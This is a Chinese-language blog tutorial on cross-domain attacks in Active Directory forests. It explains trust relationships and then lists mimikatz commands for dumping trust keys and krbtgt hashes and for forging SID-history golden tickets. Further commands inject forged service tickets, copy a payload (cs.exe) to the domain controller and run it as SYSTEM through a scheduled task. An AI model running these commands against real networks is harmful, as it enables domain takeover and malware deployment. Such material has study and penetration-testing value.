内网安全:跨域攻击

news2024/11/17 23:56:48

目录

获取域信息

利用域信任密钥获取目标域

利用krbtgt哈希值获取目标域


内网中的域林:

很多大型企业都拥有自己的内网,一般通过域林进行共享资源。根据不同职能区分的部门,从逻辑上以 主域和子域进行区分,以方便统一管理。在物理层,通常使用防火墙将各个子公司及各个部门划分为不 同的区域。

域信任关系

建立域之间的信任关系,是为了一个域的用户能方便地访问其他域的资源,同时也方便了对域网络的管 理和维护,域信任作为域中的一种机制,允许另一个域的用户在通过身份验证后访问本域中的资源。同 时,域信任利用DNS服务器定位两个不同子域的域控制器,如果两个域中的域控制器都无法找到另一个 域,也就不存在通过域信任关系进行跨域资源共享了

域信任关系分类

域信任关系分为单向信任和双向信任 单向信任:是指在两个域之间创建单向的信任路径,即在一个方向上是信任流,在另一个方向上是访问 流,受信任域内的用户(或者计算机)可以访问信任域内的资源,但信任域内的用户无法访问受信任域 内的资源。也就是说,A域信任B域,那么B域内受信任的主体可以访问A域内信任B域的资源。 双向信任:是指两个单向信任的组合,信任域和受信任域彼此信任,在两个方向上都有信任流和访问 流。这意味着,可以从两个方向在两个域之间传递身份验证请求。活动目录中的所有信任关系都是双向 可传递的。在创建子域时,会在新的父域和子域之间自动创建双向可传递信任关系,从下级域发出的身 份验证请求可以通关其父域向上流向信任域 域信任关系也可以分为内部信任和外部信任 内部信任:在默认情况下,用活动目录安装向导将新域添加到域树或林根域中,会自动创建双向可传递信 任。在现有林中创建域树时,将建立新的树根信任,当前域树中的两个或多个域之间的信任关系被称为 内部信任。这种信任关系是可传递的。例如,有三个子域BA,CA,DA,BA域信任CA域,CA域信任DA域, 则BA域也信任DA域。 外部信任是指两个不同林中的域的信任关系。外部信任是不可传递的,而且是单向的。 只有domain admins组中的用户可以管理域信任关系

跨域攻击:在内网中,拿到了一台机器,先确定位置,我们的目标就是拿下域控,确定位置以后,根据自己所处域的位置,尽所能的拿到域控权限,有时我们会在一个子域里面,或者域树里,需要我们先进行信息收集,知道自己所处的位置,然后有选择的进行跨域以此来达到拿下域控的目的

常见的跨域攻击方式:

1、常规渗透方法(利用web漏洞)

2、哈希传递票据攻击

3、利用域信任关系

获取域信息

在域中,Enterprise Admins组(出现在林中的根域中)的成员具有对目录林中所有域的完全控制权 限。在默认情况下,该组包含林中所有域控制器上具有Administrators权限的成员

查看当前域中计算机的权限

whoami /all

使用lg工具获取域的相关信息

查看域信任关系

shell nltest /domain_trusts

发现这是一个子域

获取当前域中的用户组

shell LG.exe abc\.

利用域信任密钥获取目标域

利用:

先拿下一个子域控,进行信息收集,从而通过子域控的用户执行命令拿下域控

1.先查看是否访问服务器:

shell dir \\dc.hack.com\c$

不能访问

2.使用mimikatz获取 当前域的 SID 父域的 SID 子域域管的NTLM 信任密钥rc4

mimikatz lsadump::trust /patch

mimikatz lsadump::lsa /patch /user:HACK$

在子域域控上进行信息收集,在子域的用户进行执行命令

在普通的域内用户中创建创建高权限票据

mimikatz kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi

查看是否生成成功

shell dir

上传asktgs.exe和kirbikator.exe工具,asktgs.exe伪造票据,kirbikator.exe注入票据

创建CIFS服务的票据进行复制文件的操作

shell asktgs.exe administrator.kirbi CIFS/DC.hack.com

将票据注入内存

shell kirbikator.exe lsa CIFS.DC.hack.com.kirbi

访问域控

shell dir \\dc.hack.com\c$

复制恶意文件

shell copy cs.exe \\dc.hack.com\c$

提示拒绝访问,说明没有权限,那么再伪造一个host票据

伪造结束再次复制

创建计划任务

schtasks /create /s dc.hack.com /tn test /sc onstart /tr c:\cs.exe /ru system /f

执行计划任务

schtasks /run /s dc.hack.com /i /tn "test"

最后成功上线

利用krbtgt哈希值获取目标域

利用:

获取krbtgt的散列值:

mimikatz lsadump::lsa /patch /user:krbtgt

获取关键信息:SID

mimikatz lsadump::trust /patch

构造并注入黄金票据

Kerberos::golden /user:administrator /domain:当前域名 /sid:当前SID /sids:目标域SID519 /krbtgt:krbtgt散列 /ptt

访问目标域

shell dir \\dc.hack.com\c$

复制恶意文件

执行计划任务

schtasks /create /s dc.hack.com /tn test /sc onstart /tr c:\cs.exe /ru system /f

启动计划任务:

schtasks /run /s dc.hack.com /i /tn "test"

上线

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2052593.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C++学习笔记----3、设计专业的C++程序(八)---- 设计国际象棋程序

今天我们就来介绍一个系统性的方法去设计一个C程序,一个简单的国际象棋程序。为了提供完整的案例,有些步骤的概念目前还没有讲到。现在学习该案例来获得一一些人设计过程的整体印象,当你学习了那些概念后也可以再回头重新阅读本篇。 1、需求…

《黑神话》主线时长约40小时 100%完成需90小时

《黑神话:悟空》即将正式发售,媒体评分也已解禁,M站均分为82分。在游戏发售之前,许多粉丝仍想了解关于该作的更多信息。游戏科学未确定《黑神话》游戏时长是多久,幸运的是有评测员透露其主线时长约为40小时&#xff0c…

亲测好用,吐血整理 ChatGPT 3.5/4.0 新手使用手册~ 【2024.08 更新】

废话不多说,直接分享正文~ 以下是小编为大家搜集到的最新的ChatGPT国内站,各有优缺点。 1、AI Plus(稳定使用) 推荐指数:⭐⭐⭐⭐⭐ yixiaai.com 该网站已经稳定运营了1年多了。2023年3月份第一批上线的网…

如何在Python中正确使用浅拷贝和深拷贝?

更多资料获取 📚 个人网站:ipengtao.com 在Python编程中,拷贝对象是一个常见的操作,尤其是在处理复杂数据结构时。Python提供了两种拷贝方式:浅拷贝(shallow copy)和深拷贝(deep co…

day35-四层负载

01.四层负载概念 02.四层实现对端口转发 1.克隆一台10.0.0.4 2.安装部署nginx服务 [rootlb:~]# scp 10.0.0.7:/etc/yum.repos.d/nginx.repo /etc/yum.repos.d/[rootlb:~]#yum -y install nginx3.配置nginx四层负载 [rootlb:~]#rm -rf /etc/nginx/conf.d/default.conf # 删除默认…

【重磅发布】2025华清远见新品发布会亮点、新品抢先看!

匠心服务 智启新程 大咖云集 • 行业分析 • 预见趋势 新品首发 • 课程升级 • 育人交流 - 2025华清远见新品发布会 将于2024年8月23日在北京隆重举行 诚邀您的到来! 大会背景 本次新品发布会以 “匠心服务 智启新程”为主题, 邀请多家业内知名…

顶刊中的水刊!中科院1区TOP和“平替”双打组合,3天初审,25天可录用!

高分“水刊” 前面小编解析了一本MDPI旗下能源电力类期刊《Energies》 (👉详情参考:MDPI旗下Energies“平替”:这本SCI又“水”又稳,不卡背景,25天录用吊打同行) 本期解析一本顶刊&#xff0c…

【Python零基础学习】字典

文章目录 前言一、简单字典示例二、使用字典三、字典遍历四、嵌套总结 前言 Python 字典 是一种非常强大且灵活的数据结构,它允许你通过键(key)来存储和检索值(value)。想象一下,字典就像一个巨大的电话簿…

免费分享一套SpringBoot+Vue员工管理(职工管理,考勤管理,奖惩管理,合同管理)管理系统【论文+源码+SQL脚本】,帅呆了~~

大家好,我是java1234_小锋老师,看到一个不错的SpringBootVue员工管理(职工管理,考勤管理,奖惩管理,合同管理)管理系统,分享下哈。 项目视频演示 【免费】SpringBootVue员工管理(职工管理,考勤…

Redis远程字典服务器(6) —— list类型详解

目录 一,基本情况 二,list常用命令 2.1 lpush,lrange 2.2 对于“下标越界”的思考 2.3 lpushx,rpush,rpushx 2.4 lpop,rpop 2.5 lindex,linsert,llen 2.6 lrem 2.7 ltrim…

基于B站的热门视频数据分析与情感分析【关联性、主题、情感分析】

目录 2 研究内容 2.1 主要研究内容 2.2 拟解决的关键问题 2.2.1热门视频特征的识别和提取 2.2.2情感分析与用户反馈 2.3技术路线 2.3.1数据收集 2.3.2数据预处理 2.3.3数据挖掘 2.3.4 数据可视化 2.4可行性分析 2.4.1技术可行性 2.4.2数据可行性 2.4.3经济可行性 2.5数据库设计…

vba发送邮件功能实现方法:如何调试测试?

vba发送邮件的配置步骤流程?vba发送邮件的安全指南? VBA是一种常用于自动化Office应用程序的编程语言。利用VBA发送邮件功能,用户可以实现自动化发送邮件的任务,无需手动操作。AokSend将详细探讨如何通过调试与测试来确保VBA发送…

ThreadLoad如何防止内存溢出

优质博文:IT-BLOG-CN 从 ThreadLocalMap看 ThreadLocal使用不当的内存泄漏问题 【1】基础概念 : 首先我们先看看ThreadLocalMap的类图,我们知道 ThreadLocal只是一个工具类,他为用户提供get、set、remove接口操作实际存放本地变…

MT7621+MT7915(MT7905)+MT7975 (W7621A6G-SDK)编译固件与升级固件方法

一、搭建开发环境,编译固件。 1、安装在Ubuntu 14.04.5 x86_64系统后,然后安装下面命令行。 $ sudo apt-get install git g make libncurses5-dev subversion libssl-dev gawk libxml-parser-perl unzip wget python xz-utils vim zlibc zlib1g zlib1g…

XSS---DOM破坏靶场复现

目录 一、OK,Boomer 一、网址: 二、源码分析: 三、 解决思路: 1.页面中的元素可以通过id和name直接取出来 2.覆盖 3.覆盖方法 四、ToString 五、setTimeout函数 六、使用框架白名单 七、成功绕过 ​编辑 二、案例分析…

才来鱼厂实习 1 个月,就转正了!

大家好,我是程序员鱼皮。昨天,我给才来我们公司 实习一个月 的前端开发同学转正了,直接发了正式 Offer!这个转正速度,放眼到所有公司中,我相信也是炸裂的。 看小伙子那么激动,让我回想到了 19 年…

认识 bufferbloat

很多人并不理解 bufferbloat 的本质,我引用《计算机网络-自顶向下方法(第 8 版)》第四章的一个解释: 很形象的比喻,buffer 就像盐,不可或缺,适量增味,过量食物就不能吃了。高血压患者更有所感受&#xff…

STM32是基于ARM架构的,那么ARM究竟是什么呢?

一、什么是ARM 首先,ARM是一家英国公司,全称Advanced RISC Machines,高级精简指令集机器,RISC意味着是精简指令集的芯片。同时也有复杂指令集CSIC的芯片,如X86,常以Intel和AMD为主。 其次,之后…

如何跳过极狐GitLab 密钥推送保护功能?

极狐GitLab 是 GitLab 在中国的发行版,专门面向中国程序员和企业提供企业级一体化 DevOps 平台,用来帮助用户实现需求管理、源代码托管、CI/CD、安全合规,而且所有的操作都是在一个平台上进行,省事省心省钱。可以一键安装极狐GitL…

vue 子组件全局自动导入,不在需要每个组件import

main.js import vue from vue import App from ./App.vue import axios from axios axios.defaults.baseURL HTTP://LOCALHOST:3000/api/ Vue.prototype.$http axios; vue config.productionTip false; //子组件全局自动导入 const requireComponents require.cont…